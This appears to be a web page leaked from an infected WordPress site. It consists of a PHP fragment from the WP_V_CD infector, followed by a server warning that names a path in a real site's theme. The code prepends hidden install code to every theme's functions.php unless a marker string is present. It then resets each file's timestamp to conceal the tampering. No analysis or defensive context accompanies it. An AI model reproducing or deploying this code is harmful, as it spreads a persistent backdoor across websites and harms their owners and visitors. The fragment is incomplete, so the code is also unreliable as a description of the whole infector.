if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php')){
if (strpos($content, 'WP_V_CD') === false){
$content = $install_code . $content ;
@file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php', $content);
touch( $themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php' , $time );
}
else { $ping = false; }
}
?>
Warning: Cannot modify header information - headers already sent by (output started at /home/seranews24/public_html/seraenglishversion/wp-content/themes/seranews24/functions.php:1) in /home/seranews24/public_html/seraenglishversion/wp-includes/pluggable.php on line 1223